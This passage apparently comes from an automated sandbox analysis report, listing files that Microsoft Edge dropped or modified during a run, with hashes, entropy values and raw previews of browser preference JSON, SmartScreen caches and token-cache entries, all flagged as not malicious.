                                                                                                                                                            Preview:...._+jE.`..}....S..1....G}s..E....y".Wh.^.W.H...-...#.A...KR...9b........>k......bU.IVo...D......Y..[l.yx.......'c=..I0.....E.d...-...1 ....m../C...OQ.........qW..<:N.....38.u..X-..s....<..U.,Mi..._.......`.Y/.........^..,.E..........j@..G8..N.... ..Ea...4.+.79k.!T.-5W..!..@+..!.P..LDG.....V."....L.... .(#..$..&......C.....%A.T}....K_.S..'Q.".d....s....(j.D!......Ov..)*d0)."(..%..-..G..L.}....i.....m9;.....t.w..0....f?..-..M.c.3.....N7K.T..D>.3.x...z..u$5!..4..T.....U.O^L{.5..=E..'..;.}(|.6.:..f!.>...?M.8......P.D.J.I4.<...*.y.E....>....i%.6..Y.@..n.....M..r..C.f.;..<..0.H...F....h.......HB1]1....u..:...H..k....B.Q..J...@}j~.#...'Y.J~....I...ub.&..L[z..1.W/.Ck....M.......[.......N.F..z*.{nZ~d.V.4.u.K.V.......X.<p..cz..>*....X...W..da3(..g..Z$.L4.j=~.p.l.\.[e.&&.Y ...U)..._.^r0.,.{_......`S..[....(.\..p.bt.g..%.$+....f.....d....Im..f...W ......G..i_8a..ae..7....pS.....z-H..A.s.4.3..O.r.....u.S......a.}..v.-/..... ...a.x#./:...sS&U.().xL...pg

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_638004170464094982

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:raw G3 (Group 3) FAX, byte-padded
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):460992
                                                                                                                                                            Entropy (8bit):7.999625908035124
                                                                                                                                                            Encrypted:true
                                                                                                                                                            SSDEEP:12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
                                                                                                                                                            MD5:E9C502DB957CDB977E7F5745B34C32E6
                                                                                                                                                            SHA1:DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
                                                                                                                                                            SHA-256:5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
                                                                                                                                                            SHA-512:B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:...2lI.5.<C.;.{....._+jE.`..}....-...#.A...KR...l.M0,s...).9..........x.......F.b......jU....y.h'....L<...*..Z..*%.*..._...g.4yu...........'c=..I0..........qW..<:N....<..U.,Mi..._......'(..U.9.!........u....7...4. ..Ea...4.+.79k.!T.-5W..!..@+..$..t|1.E..7F...+..xf....z&_Q...-.B...)8R.c....0.......B.M.Z...0....&v..<..H...3.....N7K.T..D>.8......P.D.J.I4.B.H.VHy...@.Wc.Cl..6aD..j.....E..*4..mI..X]2.GH.G.L...E.F.=.J...@}j~.#...'Y.L[z..1.W/.Ck....L..X........J.NYd........>...N.F..z*.{nZ~d.N..../..6.\L...Q...+.w..p...>.S.iG...0]..8....S..)`B#.v..^.*.T.?...Z.rz.D'.!.T.w....S..8....V.4.u.K.V.......W.6s...Y.).[.c.X.S..........5.X7F...tQ....z.L.X..(3#j...8...i.[..j$.Q....0...]"W.c.H..n..2Te.ak...c..-F(..W2.b....3.]......c.d|.../....._...f.....d....Im..g.b..R.q.<x*x...i2..r.I()Iat..b.j.r@K.+5..C.....nJ.>*P,.V@.....s.4.3..O.r.....smd7...L.....].u&1../t.*.......uXb...=@.....wv......]....#.{$.w......i.....|.....?....E7...}$+..t).E.U..Q..~.`.)..Y@.6.h.......%(

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):9
                                                                                                                                                            Entropy (8bit):3.169925001442312
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:CMzOn:CM6
                                                                                                                                                            MD5:B6F7A6B03164D4BF8E3531A5CF721D30
                                                                                                                                                            SHA1:A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
                                                                                                                                                            SHA-256:3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
                                                                                                                                                            SHA-512:4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:uriCache_

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache_

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):179
                                                                                                                                                            Entropy (8bit):4.997579644150377
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:YTyLSmafBoTfIeRDHtDozRLuLgfGBkGAeekVy8HfzXNPIAclTeOIn:YWLSGTt1o9LuLgfGBPAzkVj/T8lgn
                                                                                                                                                            MD5:C6E7E9968E510E35D3EA75D9834E3268
                                                                                                                                                            SHA1:958F3D4372CA54EB35DDDCC04086C8D4CC8250EE
                                                                                                                                                            SHA-256:689E587E79A77399E8CC1976B6567E94510ADDB03354504D5033716C5A62DE47
                                                                                                                                                            SHA-512:A1EB77459E5526A51FAF22CD663F76034F3DD1470FE2C2F71398E463AFE88693926BD9E3DB294F066516B35FBA9BACEFE4C1CA696A9A2428762CA295EF6598FE
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"version":1,"cache_data":[{"file_hash":"da2d278eafa98c1f","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1736301902012677}]}

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Variations

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):86
                                                                                                                                                            Entropy (8bit):4.389669793590032
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:YQ3JYq9xSs0dMEJAELJ25AmIpozQOn:YQ3Kq9X0dMgAEiLIMn
                                                                                                                                                            MD5:03B6D5E81A4DC4D4E6C27BE1E932B9D9
                                                                                                                                                            SHA1:3C5EF0615314BDB136AB57C90359F1839BDD5C93
                                                                                                                                                            SHA-256:73B017F7C5ECD629AD41D14147D53F7D3D070C5967E1E571811A6DB39F06EACC
                                                                                                                                                            SHA-512:0037EB23CCDBDDE93CFEB7B9A223D59D0872D4EC7F5E3CA4F7767A7301E96E1AF1175980DC4F08531D5571AFB94DF789567588DEB2D6D611C57EE4CC05376547
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"user_experience_metrics.stability.exited_cleanly":true,"variations_crash_streak":15}

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\c4b867cb-cd3c-4e18-beb8-e1cec6a633f2.tmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):23955
                                                                                                                                                            Entropy (8bit):6.048048787523318
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:E1tMkaMJH2m8qVT8IeQ0I5t0b9MEFdsNwhIwbGTDGjfT35ub/Y3jFd4X:EfMkbJrT8IeQc5d1lbGTDCfL5uTY3JY
                                                                                                                                                            MD5:4E7C799F78E250EB07FCB465E4F98380
                                                                                                                                                            SHA1:4EE7DEB750C34A0C06AEAC463B6A09957295F424
                                                                                                                                                            SHA-256:12391B31B8BC70C3C56369F05F6940AEC768041432F60C4E26201C7839F15EE8
                                                                                                                                                            SHA-512:AE1E9AC6E581FA909383CB01DA867A62620052A7AE32BE1661326C79A5D5871D782BE5783C12D25C5C7721BB09A55F1C7D685BB7916634611904A834162EEA8D
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13380674699199088","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1736201103"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5G

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\cc506f36-dbf1-408d-be5a-983a897c0a60.tmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):8110
                                                                                                                                                            Entropy (8bit):5.802448102599817
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:asNAD9seiRUfJQKlkDa6qRAq1k8SPxVLZ7VTiq:asNAMCWK2Da6q3QxVNZTiq
                                                                                                                                                            MD5:0DB49AF6BF5D40977295E766B00C560D
                                                                                                                                                            SHA1:9EBCA6F2EB1FBCEA3EBB8D3ACA0D10FBD7ADC27C
                                                                                                                                                            SHA-256:D7CB7D64A0553FFA8D952A9B96A0FCFE18A5DC7559B743B350596801D26AB4DC
                                                                                                                                                            SHA-512:27AB778AF0DEB1915BA474DD193560AE1A859F6A3E58F9413AC840075CF44CE79EF6B6894AB4FCD3B7DCECAE0318E01684FDA614130F47CF0DDC48741858DC4D
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_mig

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ef19aea9-8c11-4b18-8a7c-b8b6ef3ebbf0.tmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:modified
                                                                                                                                                            Size (bytes):8110
                                                                                                                                                            Entropy (8bit):5.802448102599817
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:asNAD9seiRUfJQKlkDa6qRAq1k8SPxVLZ7VTiq:asNAMCWK2Da6q3QxVNZTiq
                                                                                                                                                            MD5:0DB49AF6BF5D40977295E766B00C560D
                                                                                                                                                            SHA1:9EBCA6F2EB1FBCEA3EBB8D3ACA0D10FBD7ADC27C
                                                                                                                                                            SHA-256:D7CB7D64A0553FFA8D952A9B96A0FCFE18A5DC7559B743B350596801D26AB4DC
                                                                                                                                                            SHA-512:27AB778AF0DEB1915BA474DD193560AE1A859F6A3E58F9413AC840075CF44CE79EF6B6894AB4FCD3B7DCECAE0318E01684FDA614130F47CF0DDC48741858DC4D
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_mig

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\f0e49aaf-7f4d-455a-84e4-b79c17ff89fa.tmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):8291
                                                                                                                                                            Entropy (8bit):5.791013339446293
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:fsNAD9seiRUv0j6lkDs6qRAq1k8SPxVLZ7VTiQ:fsNAMYq62Ds6q3QxVNZTiQ
                                                                                                                                                            MD5:EEC67A56BBA977DB73D5CCBD76768A42
                                                                                                                                                            SHA1:4652A6054DB674D0B45BA2E80A6CB6456297470A
                                                                                                                                                            SHA-256:C3A1D33180F9C9EA627749760CF7D78326AE437C9498A5702F60961C18757F92
                                                                                                                                                            SHA-512:E78BCF35A28DC451F9267B4118A9BE929710356D84DACFB87C021273E9E0CD0001F93E136BF08A0C202C268EAFC22485ECE0D6DC200EB189DB54F02A0D90DF40
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Ve

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ffa13bcc-27d7-4be9-a170-eccbba4692b5.tmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):22840
                                                                                                                                                            Entropy (8bit):6.045181776419729
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:E1tMkaMJH2m8qVT8IeQ0I5t0b9MEFdsNwhIwk2DmT35ub/Y3jFd4X:EfMkbJrT8IeQc5d1lk2DmL5uTY3JY
                                                                                                                                                            MD5:FE2502B8EA4D4777D0B439556404397B
                                                                                                                                                            SHA1:4B8E3F16C854115993F81D3473B7664FFEF3FFAC
                                                                                                                                                            SHA-256:BD4AC9BA0376A14AE3D680CC28F5268F35D4303C6B1F40D55D576B4F56AE8170
                                                                                                                                                            SHA-512:C7AAE48AEE9B8439D847285D97C112E44F20D474985232D3A9C63E8CF1507737DF5B977407A49938750028603A19123618A1CAC157674451341A470A05B7584D
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13380674699199088","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1736201103"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5G

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2278
                                                                                                                                                            Entropy (8bit):3.8445209896592716
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:uiTrlKxrgx+prxl9Il8usKfbl0AMVkNB+OkHtsd1rc:m7Yxfbl0A8kz+
                                                                                                                                                            MD5:A154F622790EA06BCEF65BC8968DC37D
                                                                                                                                                            SHA1:025E6545F119749D260679A9A6CB8CF38B63E88E
                                                                                                                                                            SHA-256:EDAB928897D519AB7607AB4D8FA29C85DA95AF26469BE422FD13EB5EF21F53E1
                                                                                                                                                            SHA-512:AFA7DC3661432D27673426A04FAB8DD5BE9B223AA4D987EF42F01570E465DACB3EC20F949FCA86B3BE22B27CA5A403136594DB7DAC0A3BD181C89DBA0946AA23
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.O.N.x.a.o.9.g.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.y.P.y.4.R.D.

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\cf7513a936f7effbb38627e56f8d1fce10eb12cc.tbres

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):4622
                                                                                                                                                            Entropy (8bit):3.9998927694029756
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:lYxfpeFaYEkGsB8ldBONPYIQmAkJrlLhlM8FdkHm:lqxKaLZsdFQKJrlLhld0m
                                                                                                                                                            MD5:ACA9C7AD1CC10B02D0AE6FF8EDC1D7BA
                                                                                                                                                            SHA1:CA767CA63EE702FEB33D84A956052664CCA7C3E6
                                                                                                                                                            SHA-256:CBD1765DD83675A0D19BC486F4E4FBB5A30948199A3917BA3E733CC3F5C54C37
                                                                                                                                                            SHA-512:0D451CED82563BC960A5F27BA19CF1A2E71989DD3F74141D412F3C6B52C6895B4427DBA98FB1080E330BE9B4444B7786DBFD6BEB0CBCFD8E7C5D3BAAEA348016
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".7.k.l.0.U.I.d.g.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.y.P.y.4.R.D.

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\e8ddd4cbd9c0504aace6ef7a13fa20d04fd52408.tbres

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2684
                                                                                                                                                            Entropy (8bit):3.905924802322502
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:uiTrlKx68Wa7xDxl9Il8usKfRbJTRZQ4rYA/jhJxyqixrgJnrLSd/vc:adYxfRH64V5JixcJrLv
                                                                                                                                                            MD5:E089C65CA10F2A2C88A2B286FA6EC7A2
                                                                                                                                                            SHA1:0DC625CA4D523A9B3938108B1E8A0F8B6D4B5C95
                                                                                                                                                            SHA-256:067D79A20ACA097122FFCAC65C1CABE263EA20084D0F94B22E9619EE64E735A5
                                                                                                                                                            SHA-512:1AADF5879ABCCE712CA4A8039401B6484C3C77D6A2B77449C3A365FF2BF2E944B0185DE42C76AA359EDEA5B628D2B507D19153257BCA756C1EF2759C5BE8C5B9
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".h.D.c.1.g.V.h./.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.y.P.y.4.R.D.

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\1f154860-0323-4959-9ae2-84da55fb74b4.tmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JPEG image data, comment: "Lavc59.36.100", baseline, precision 8, 1280x720, components 3
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):114963
                                                                                                                                                            Entropy (8bit):7.963603752379406
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3072:419o92kBIRRecc+HoP7C+gYZbDAaGcMz/M7tHe:r92kB4RGjCkQide
                                                                                                                                                            MD5:31100EB09CAB25F5CADABEAD12D587F4
                                                                                                                                                            SHA1:8D52FDDEA9F3F149F9EA57833D601F799F2F5017
                                                                                                                                                            SHA-256:A65D95065CE603015C70A81816ACF0752B6AD1A5EBA3AF6251BF992F596ECB39
                                                                                                                                                            SHA-512:61C35507BFF77637596E9CC4990B5040CE96C09F5D8057DC9D7B2A9E65747EBB908B52C457BC84BA26453805FFDA5647FB3880EF5A0261470C4CE55808E18EB5
                                                                                                                                                            Malicious:false
